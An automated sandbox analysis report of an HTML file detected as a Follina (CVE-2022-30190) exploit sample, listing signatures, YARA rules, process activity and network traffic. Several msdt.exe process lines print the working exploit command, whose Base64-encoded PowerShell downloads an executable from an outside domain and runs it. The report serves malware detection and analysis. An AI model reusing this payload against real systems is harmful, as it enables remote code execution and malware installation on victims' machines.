
Windows Analysis Report
blog.html

Overview

General Information

Sample Name: blog.html
Analysis ID: 654145
MD5: fef2b6879c54b532ac0700113dd4173c
SHA1: 824bfa2bbfbe11c7810f1a857ecf1d7d64fe2743
SHA256: 9d16c6ba4ec1c23f9e35c05b6e17425fdc6cf4d5a3d5ea100129b24c21d68b7d
Tags: Follina, html

Detection

Detection: Follina CVE-2022-30190
Score: 48
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
IP address seen in connection with other malware

Classification

  • System is w10x64
  • chrome.exe (PID: 6260 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\blog.html MD5: C139654B5C1438A95B321BB01AD63EF6)
    • chrome.exe (PID: 6420 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8 MD5: C139654B5C1438A95B321BB01AD63EF6)
    • msdt.exe (PID: 6900 cmdline: "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
  • cleanup
No configs have been found
Source: blog.html
Rule: SUSP_PS1_Msdt_Execution_May22
Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation
Author: Nasreddine Bencherchali, Christian Burkard
Strings:
  • 0x25:$a: PCWDiagnostic
  • 0x19:$sa3: ms-msdt
  • 0x79:$sb3: IT_BrowseForFile=

Source: blog.html
Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22
Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation
Author: Tobias Michalski, Christian Burkard
Strings:
  • 0x8:$re1: location.href = "ms-msdt:

Source: blog.html
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: 0000000E.00000002.672988587.00000215ED760000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: 0000000E.00000002.673016389.00000215ED769000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

Source: 0000000E.00000002.673521929.00000215ED874000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Follina
Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190
Author: Joe Security

No Sigma rule has matched
No Snort rule has matched


Exploits

Source: Yara match | File source: blog.html, type: SAMPLE
Source: Yara match | File source: 0000000E.00000002.672988587.00000215ED760000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.673016389.00000215ED769000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.673521929.00000215ED874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Joe Sandbox View | IP Address: 239.255.255.250 239.255.255.250
Source: unknown | DNS traffic detected: queries for: accounts.google.com
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown | Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443
Source: global traffic | HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=85.0.4183.121&lang=en-GB&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-85.0.4183.121Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: pnacl_public_x86_64_pnacl_sz_nexe.0.dr, pnacl_public_x86_64_pnacl_llc_nexe.0.dr | String found in binary or memory: http://llvm.org/):
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://accounts.google.com
Source: craw_window.js.0.dr | String found in binary or memory: https://accounts.google.com/MergeSession
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://apis.google.com
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr | String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-clang.git
Source: pnacl_public_x86_64_libpnacl_irt_shim_dummy_a.0.dr | String found in binary or memory: https://chromium.googlesource.com/a/native_client/pnacl-llvm.git
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://clients2.google.com
Source: manifest.json1.0.dr, manifest.json.0.dr | String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://clients2.googleusercontent.com
Source: pnacl_public_x86_64_ld_nexe.0.dr | String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry
Source: pnacl_public_x86_64_ld_nexe.0.dr | String found in binary or memory: https://code.google.com/p/nativeclient/issues/entry%s:
Source: 84e1d201-80a6-4e6e-9f8a-7dcb319e9d15.tmp.1.dr, 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 7bb7e723-11a5-43d8-abb5-a21c25034ef8.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://dns.google
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://fonts.googleapis.com
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://fonts.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr | String found in binary or memory: https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.p
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://ogs.google.com
Source: craw_window.js.0.dr, manifest.json.0.dr | String found in binary or memory: https://payments.google.com/payments/v4/js/integrator.js
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://play.google.com
Source: 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://r5---sn-h0jeln7l.gvt1.com
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://redirector.gvt1.com
Source: craw_window.js.0.dr, manifest.json.0.dr | String found in binary or memory: https://sandbox.google.com/payments/v4/js/integrator.js
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://ssl.gstatic.com
Source: craw_window.js.0.dr, craw_background.js.0.dr | String found in binary or memory: https://www-googleapis-staging.sandbox.google.com
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://www.google.com
Source: manifest.json.0.dr | String found in binary or memory: https://www.google.com/
Source: craw_window.js.0.dr | String found in binary or memory: https://www.google.com/accounts/OAuthLogin?issueuberauth=1
Source: craw_window.js.0.dr | String found in binary or memory: https://www.google.com/images/cleardot.gif
Source: craw_window.js.0.dr | String found in binary or memory: https://www.google.com/images/dot2.gif
Source: craw_window.js.0.dr | String found in binary or memory: https://www.google.com/images/x2.gif
Source: craw_background.js.0.dr | String found in binary or memory: https://www.google.com/intl/en-US/chrome/blank.html
Source: craw_window.js.0.dr, craw_background.js.0.dr, 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://www.googleapis.com
Source: manifest.json.0.dr | String found in binary or memory: https://www.googleapis.com/
Source: manifest.json.0.dr | String found in binary or memory: https://www.googleapis.com/auth/chromewebstore
Source: manifest.json.0.dr | String found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonly
Source: manifest.json.0.dr | String found in binary or memory: https://www.googleapis.com/auth/sierra
Source: manifest.json.0.dr | String found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
Source: 3bd28c3b-f83f-4a19-82d8-e4552159d6e9.tmp.1.dr, 0d3bff7a-d9a6-438c-8117-b872b8c23851.tmp.1.dr | String found in binary or memory: https://www.gstatic.com
Source: unknown | HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en-US;q=0.9,en;q=0.8
Source: blog.html, type: SAMPLE | Matched rule: SUSP_PS1_Msdt_Execution_May22 date = 2022-05-31, author = Nasreddine Bencherchali, Christian Burkard, description = Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-06-20
Source: blog.html, type: SAMPLE | Matched rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22 date = 2022-05-30, author = Tobias Michalski, Christian Burkard, description = Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, reference = https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, score = , modified = 2022-05-31, hash = 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Local\Temp\4bb935c4-12fa-4ae6-9272-8704f42aef9e.tmp
Source: C:\Windows\System32\msdt.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: classification engine | Classification label: mal48.expl.winHTML@32/121@2/8
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --enable-automation "C:\Users\user\Desktop\blog.html
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1528,2458455930681396657,16758854869973346526,131072 --lang=en-GB --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1948 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Windows\System32\msdt.exe "C:\Windows\system32\msdt.exe" ms-msdt:/id%20PCWDiagnostic%20/skip%20force%20/param%20%22IT_RebrowseForFile=?%20IT_LaunchMethod=ContextMenu%20IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'aXdyIGh0dHBzOi8vY29uc3VtZXJmaW5hbmNlZ3VpZGUuY29tL2Jsb2cvaW5kZXgvZ3B1cGRhdGUuZXhlIC1PdXRGaWxlIEM6XFdpbmRvd3NcVGFza3NcZ3B1cGRhdGUuZXhlOyBDOlxXaW5kb3dzXFRhc2tzXGdwdXBkYXRlLmV4ZQo='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe%22
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62BBFD6F-1874.pma
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | Automated click: Next
Source: C:\Windows\System32\msdt.exe | File opened: C:\Windows\system32\MSFTEDIT.DLL
Source: C:\Windows\System32\msdt.exe | Window / User API: threadDelayed 1850
Source: C:\Windows\System32\msdt.exe | Window / User API: threadDelayed 1170